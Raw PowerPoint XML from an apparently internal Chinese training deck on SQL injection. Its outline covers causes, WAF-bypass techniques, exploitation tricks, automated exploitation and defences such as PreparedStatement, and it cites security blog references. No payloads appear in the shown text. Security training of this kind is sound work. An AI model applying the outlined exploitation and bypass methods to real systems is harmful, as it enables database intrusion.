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3.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87"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId88"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId4"/>
    <p:sldId id="257" r:id="rId5"/>
    <p:sldId id="272" r:id="rId6"/>
    <p:sldId id="277" r:id="rId7"/>
    <p:sldId id="917" r:id="rId8"/>
    <p:sldId id="918" r:id="rId9"/>
    <p:sldId id="919" r:id="rId10"/>
    <p:sldId id="920" r:id="rId11"/>
    <p:sldId id="921" r:id="rId12"/>
    <p:sldId id="922" r:id="rId13"/>
    <p:sldId id="273" r:id="rId14"/>
    <p:sldId id="274" r:id="rId15"/>
    <p:sldId id="293" r:id="rId16"/>
    <p:sldId id="284" r:id="rId17"/>
    <p:sldId id="285" r:id="rId18"/>
    <p:sldId id="923" r:id="rId19"/>
    <p:sldId id="924" r:id="rId20"/>
    <p:sldId id="281" r:id="rId21"/>
    <p:sldId id="1049" r:id="rId22"/>
    <p:sldId id="294" r:id="rId23"/>
    <p:sldId id="1050" r:id="rId24"/>
    <p:sldId id="1051" r:id="rId25"/>
    <p:sldId id="296" r:id="rId26"/>
    <p:sldId id="988" r:id="rId27"/>
    <p:sldId id="989" r:id="rId28"/>
    <p:sldId id="1052" r:id="rId29"/>
    <p:sldId id="1053" r:id="rId30"/>
    <p:sldId id="990" r:id="rId31"/>
    <p:sldId id="298" r:id="rId32"/>
    <p:sldId id="276" r:id="rId33"/>
    <p:sldId id="300" r:id="rId34"/>
    <p:sldId id="301" r:id="rId35"/>
    <p:sldId id="303" r:id="rId36"/>
    <p:sldId id="302" r:id="rId37"/>
    <p:sldId id="309" r:id="rId38"/>
    <p:sldId id="310" r:id="rId39"/>
    <p:sldId id="1046" r:id="rId40"/>
    <p:sldId id="1047" r:id="rId41"/>
    <p:sldId id="1048" r:id="rId42"/>
    <p:sldId id="328" r:id="rId43"/>
    <p:sldId id="904" r:id="rId44"/>
    <p:sldId id="905" r:id="rId45"/>
    <p:sldId id="906" r:id="rId46"/>
    <p:sldId id="907" r:id="rId47"/>
    <p:sldId id="908" r:id="rId48"/>
    <p:sldId id="909" r:id="rId49"/>
    <p:sldId id="910" r:id="rId50"/>
    <p:sldId id="911" r:id="rId51"/>
    <p:sldId id="912" r:id="rId52"/>
    <p:sldId id="913" r:id="rId53"/>
    <p:sldId id="914" r:id="rId54"/>
    <p:sldId id="915" r:id="rId55"/>
    <p:sldId id="916" r:id="rId56"/>
    <p:sldId id="304" r:id="rId57"/>
    <p:sldId id="305" r:id="rId58"/>
    <p:sldId id="306" r:id="rId59"/>
    <p:sldId id="307" r:id="rId60"/>
    <p:sldId id="299" r:id="rId61"/>
    <p:sldId id="312" r:id="rId62"/>
    <p:sldId id="282" r:id="rId63"/>
    <p:sldId id="313" r:id="rId64"/>
    <p:sldId id="314" r:id="rId65"/>
    <p:sldId id="315" r:id="rId66"/>
    <p:sldId id="318" r:id="rId67"/>
    <p:sldId id="319" r:id="rId68"/>
    <p:sldId id="320" r:id="rId69"/>
    <p:sldId id="321" r:id="rId70"/>
    <p:sldId id="322" r:id="rId71"/>
    <p:sldId id="323" r:id="rId72"/>
    <p:sldId id="324" r:id="rId73"/>
    <p:sldId id="325" r:id="rId74"/>
    <p:sldId id="326" r:id="rId75"/>
    <p:sldId id="316" r:id="rId76"/>
    <p:sldId id="317" r:id="rId77"/>
    <p:sldId id="283" r:id="rId78"/>
    <p:sldId id="286" r:id="rId79"/>
    <p:sldId id="287" r:id="rId80"/>
    <p:sldId id="288" r:id="rId81"/>
    <p:sldId id="289" r:id="rId82"/>
    <p:sldId id="290" r:id="rId83"/>
    <p:sldId id="291" r:id="rId84"/>
    <p:sldId id="292" r:id="rId85"/>
    <p:sldId id="259" r:id="rId86"/>
  </p:sldIdLst>
  <p:sldSz cx="24384000" cy="13716000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:custDataLst>
    <p:tags r:id="rId89"/>
  </p:custDataLst>
  <p:defaultTextStyle>
    <a:defPPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" fontAlgn="auto" latinLnBrk="1" hangingPunct="0">
      <a:lnSpc>
        <a:spcPct val="100000"/>
      </a:lnSpc>
      <a:spcBef>
        <a:spcPts val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPts val="0"/>
      </a:spcAft>
      <a:buClrTx/>
      <a:buSzTx/>
      <a:buFontTx/>
      <a:buNone/>
      <a:defRPr kumimoji="0" sz="19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95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1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298" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="7679"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co He" initials="CH" lastIdx="1" clrIdx="0"/>
  <p:cmAuthor id="2" name="Jennifer Li" initials="JL" lastIdx="4" clrIdx="1"/>
  <p:cmAuthor id="3" name="Jinlei-pc" initials="JL" lastIdx="8"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9FA"/>
    <a:srgbClr val="E97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084" autoAdjust="0"/>
    <p:restoredTop sz="87515" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1" showGuides="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="50" d="100"/>
          <a:sy n="50" d="100"/>
        </p:scale>
        <p:origin x="216" y="48"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="4298"/>
        <p:guide pos="7679"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slid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slide" Target="slides/slide73.xml"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide81.xml"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="tags/tag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slide" Target="slides/slide71.xml"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide76.xml"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="notesMasters/notesMaster1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide2.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide58.xml"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide79.xml"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/commentAuthors" Target="commentAuthor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handoutMaster" Target="handoutMasters/handoutMaster1.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69F216-FC97-F245-80FF-C0F69FB51D10}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2023/6/13</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28BC57-A451-F24B-B6C9-41B36D2308AE}"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7pPr>
    <a:lvl8pPr indent="15995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8pPr>
    <a:lvl9pPr indent="18281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defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr sz="1200">
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>恒好美佳   </a:t>
            </a:r>
            <a:r>
              <a:t>https://sppt.taobao.com/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https://www.cnblogs.com/zzhoo/p/12358384.html</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2620326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https://blog.csdn.net/weixin_44189363/article/details/108277917</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>https://blog.csdn.net/weixin_44189363/article/details/108277917</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>https://blog.csdn.net/qq_41631806/article/details/105453071</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41574420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3870932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https://xz.aliyun.com/t/253/</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="138859553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https://www.anquanke.com/post/id/205376#h2-9</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此时不存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入漏洞，传入的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>已进行转义</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Statement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的区别在于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>PrepareStatement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>会对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句进行预编译，预编译的好处不仅在于在一定程度上防止了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入，还减少了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句的编译次数，提高了性能，其原理是先去编译</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句，无论最后输入为何，预编译的语句只是作为字符串来执行，而</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入只对编译过程有破坏作用，执行阶段只是把输入串作为数据处理，不需要再对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句进行解析，因此解决了注入问题。</a:t>
            </a:r>
          </a:p>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https://tttang.com/archive/1726/#toc_hibernatesql</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>https://zhuanlan.zhihu.com/p/375191037</a:t>
            </a:r>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https://xie1997.blog.csdn.net/article/details/102372326</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https://blog.csdn.net/qq_46246629/article/details/123855334</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https://blog.csdn.net/yz_weixiao/article/details/129136870</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https://www.wangmingchang.com/4857.html</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2023/6/13</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2023/6/13</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2" name="Shape 245"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4828663" y="4572627"/>
            <a:ext cx="14957899"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
        <p:nvSpPr>
          <p:cNvPr id="14" name="Shape 245"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10892627" y="7467165"/>
            <a:ext cx="2598746"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2021.07</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="50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dirty="0"/>
                <a:t>  </a:t>
              </a:r>
              <a:endParaRPr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2023/6/13</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2023/6/13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2023/6/13</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2023/6/13</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2023/6/13</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tags" Target="../tags/tag3.xml"/><Relationship Id="rId4"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2075283" y="11165780"/>
            <a:ext cx="9694545" cy="1631212"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="241300" dist="29252" dir="5400000" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="25002"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="45718" tIns="45718" rIns="45718" bIns="45718">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="914400">
              <a:defRPr sz="10000" spc="400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="PingFang SC Medium" panose="020B0400000000000000" charset="-122"/>
                <a:ea typeface="PingFang SC Medium" panose="020B0400000000000000" charset="-122"/>
                <a:cs typeface="PingFang SC Medium" panose="020B0400000000000000" charset="-122"/>
                <a:sym typeface="PingFang SC Medium" panose="020B0400000000000000" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>202</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>3.07</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="172" name="Shape 172"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1903984" y="2550220"/>
            <a:ext cx="18462198" cy="3477871"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="139700" dist="90850" dir="5400000" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="44851"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="45718" tIns="45718" rIns="45718" bIns="45718">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="914400">
              <a:defRPr sz="11000" spc="1099">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>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lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>安全</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测试部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许明龙</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="176" name="Shape 176"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16273317" y="9987244"/>
            <a:ext cx="2801901" cy="2"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="50799" tIns="50799" rIns="50799" bIns="50799" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>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113" y="6172200"/>
            <a:ext cx="10734675"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639742" y="2438400"/>
            <a:ext cx="18913766" cy="3170099"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>了解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>owasp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> top 10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>漏洞的原理、判别方法、利用手法、了解防火墙绕过方法，了解 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CDN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>技术、负载均衡技术、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>技术、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MVC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>框架、要了解主流服务器软件的特性漏洞、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>编码、常见加密解密技术、目录爆破、子域名爆破、后台爆破、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ssl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等等</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4131001" cy="1413616"/>
            <a:chOff x="-1" y="133127"/>
            <a:chExt cx="4131000" cy="1413614"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="66" name="Group 196"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="-1" y="133127"/>
              <a:ext cx="4131000" cy="1122683"/>
              <a:chOff x="-1" y="133128"/>
              <a:chExt cx="4130999"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2236507"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注入漏洞</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9945395"/>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01974" y="2149113"/>
            <a:ext cx="22180052" cy="93502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kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1102000" y="3084133"/>
            <a:ext cx="22180026" cy="7949627"/>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endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="4000" b="1" dirty="0"/>
              <a:t>目录</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="4000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="4000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入背景</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入危害</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入产生的原因</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入绕过汇总</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入的挖掘</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入利用技巧</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>自动化利用</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>推荐的防范措施</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4"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101" name="图片 100"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="13390245" y="3999230"/>
            <a:ext cx="9202420" cy="6917690"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="102" name="图片 101"/>
          <p:cNvPicPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5778500" y="5155565"/>
            <a:ext cx="6549390" cy="484632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6678751"/>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1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>背景：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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zh-CN" altLang="en-US" sz="2800" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>什么是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" kern="1200" dirty="0" err="1">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在现代</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应用程序中，数据库用于存储和管理大量的数据。为了与数据库进行交互，开发人员通常使用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语言编写查询、插入、更新和删除等操作。然而，如果在应用程序中未正确验证和处理用户输入，恶意用户可以通过注入恶意的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代码来执行未授权的操作，这就是</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p>
          <a:p>
            <a:pPr algn="l"/>
